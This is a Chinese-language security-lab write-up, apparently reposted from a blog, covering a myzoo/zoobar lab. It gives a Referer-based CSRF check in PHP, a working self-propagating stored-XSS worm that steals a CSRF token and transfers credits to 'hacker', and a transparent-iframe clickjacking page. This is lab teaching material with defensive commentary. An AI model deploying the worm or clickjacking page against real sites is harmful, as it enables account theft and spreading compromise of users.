信息安全实践:CSRF & XSS & Click Jacking

信息安全实践:CSRF & XSS & Click Jacking

CSRF

防御

Referer（基于 HTTP Referer 头的校验）

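/* Add to transfer.php: Referer-based CSRF check for the transfer form.
 *
 * Caveats a reviewer should keep in mind:
 *  - The Referer header is client-supplied and is frequently absent
 *    (Referrer-Policy, privacy extensions, some proxies), so a missing
 *    header is treated as a failed transfer here - expect false negatives.
 *  - Treat this as defence in depth only; the primary CSRF defence should
 *    be a per-session synchronizer token (the "csrf" field used elsewhere
 *    on this page) and/or SameSite cookies.
 */
// Read the header defensively: a missing key must not emit a notice or
// fall through as null into the comparison below.
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';

// Debug output kept from the original. Never echo a raw request header into
// the page unescaped - it is attacker-influenced input in an HTML context.
echo htmlspecialchars($referer, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

// Strict (!==) comparison against the exact expected origin and path.
// A prefix or substring check (e.g. strpos) would be bypassable via
// "http://myzoo.com.attacker.example/transfer.php"-style URLs.
if ($referer !== "http://myzoo.com/transfer.php") {
    echo "transfer fail";
} else {
    echo "transfer pass";
}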

XSS

蠕虫

<span id=hack>
<script>
	/* Lab-style stored-XSS worm. NOTE: the last block re-posts the entire
	 * innerHTML of #hack (these comments included), so everything the
	 * payload needs must live inside this span. */

	/* Step 1: fetch the transfer page and extract the CSRF token from it.
	 * The request is synchronous (third arg false), so the readyState==4
	 * callback has run and `t` is populated before step 2 starts. */
	var a = new XMLHttpRequest();
	var t, context;
	a.onreadystatechange = function() {
		if(a.readyState == 4) {
			context = (a.responseText);
			/* Token field has id "csrf". The +24 / 32 are hard-coded offsets
			 * into the response markup - brittle: any change to the form's
			 * HTML (attribute order, whitespace, token length) breaks this. */
			/* Debug artifact: this alert is shown to the victim and reveals
			 * the injection; it is not needed for the attack to work. */
			alert(context.substr(context.indexOf("csrf")+24, 32))
			t = context.substr(context.indexOf("csrf")+24, 32);
		}
	};
	a.open("GET", "transfer.php", false);
	a.send()

	/* Step 2: steal zoobars. Same-origin POST, so the browser attaches the
	 * victim's ambient credentials; the stolen token `t` defeats the
	 * synchronizer-token check. NOTE(review): if the GET above failed,
	 * `t` is undefined and this sends "csrf=undefined". */
	var b = new XMLHttpRequest();
	b.open("POST", "transfer.php", true);
	b.setRequestHeader("content-type", "application/x-www-form-urlencoded");
	w = "zoobars=1&recipient=hacker&submission=Send&csrf="+t;
	b.send(w);
	
	/* Step 3: worm - overwrite the current user's profile with a copy of
	 * this whole span. Propagation only works if index.php renders the
	 * profile without HTML-escaping it - presumably the lab's bug being
	 * demonstrated; verify against the target. */
	var c = new XMLHttpRequest();
        c.open("POST", "index.php", true);
        c.setRequestHeader("Content-type","application/x-www-form-urlencoded");
        str =  "<span id=hack>" +  document.getElementById("hack").innerHTML + "</span>";
        str = encodeURIComponent(str);
        w = "profile_submit=Save&profile_update=" + str;
        c.send(w);
</script>
</span>

Click Jacking

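<!DOCTYPE html>
<!--
  Clickjacking demo page.

  How it works: the target page is loaded in an iframe that is fully
  transparent (opacity 0) and stacked ABOVE the visible decoy button
  (iframe z-index 2, button z-index -1). The user sees and aims for the
  "click!" button, but the click lands on whatever the framed page has at
  that position (the button's top/left presumably line up with the framed
  transfer form's submit control - tune against the real target).

  Defence, for the framed application: send `X-Frame-Options: DENY` (or
  SAMEORIGIN) and/or `Content-Security-Policy: frame-ancestors 'none'`
  so the browser refuses to render it inside a third-party frame.
-->
<html>
<head>
    <!-- charset meta must be inside <head>; the original placed it before <head>. -->
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <title>click attack</title>
    <style>
    iframe {
        width: 600px;
        height: 450px;
        /* z-index only takes effect when position is not static */
        position: absolute;
        top: 0;
        left: 0;
        /* Above the decoy button so it receives the click */
        z-index: 2;
        -moz-opacity: 0;             /* legacy Gecko equivalent of opacity */
        filter: alpha(opacity=0);    /* IE < 9 equivalent of opacity */
        opacity: 0;                  /* invisible but still clickable */
    }
    button {
        position: absolute;
        top: 350px;
        left: 170px;
        /* Below the iframe: visible to the user, unreachable by the pointer */
        z-index: -1;
        width: 75px;
        height: 30px;
    }
    </style>
</head>
<body>
    <!-- Original had "http:www.myzoo.com/..." (missing "//"), which resolves
         as a relative path instead of the intended absolute URL. -->
    <iframe name="real" src="http://www.myzoo.com/transfer.php"> </iframe>
    <button>click!</button>
</body>
</html>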


转载自blog.csdn.net/m_pNext/article/details/112337306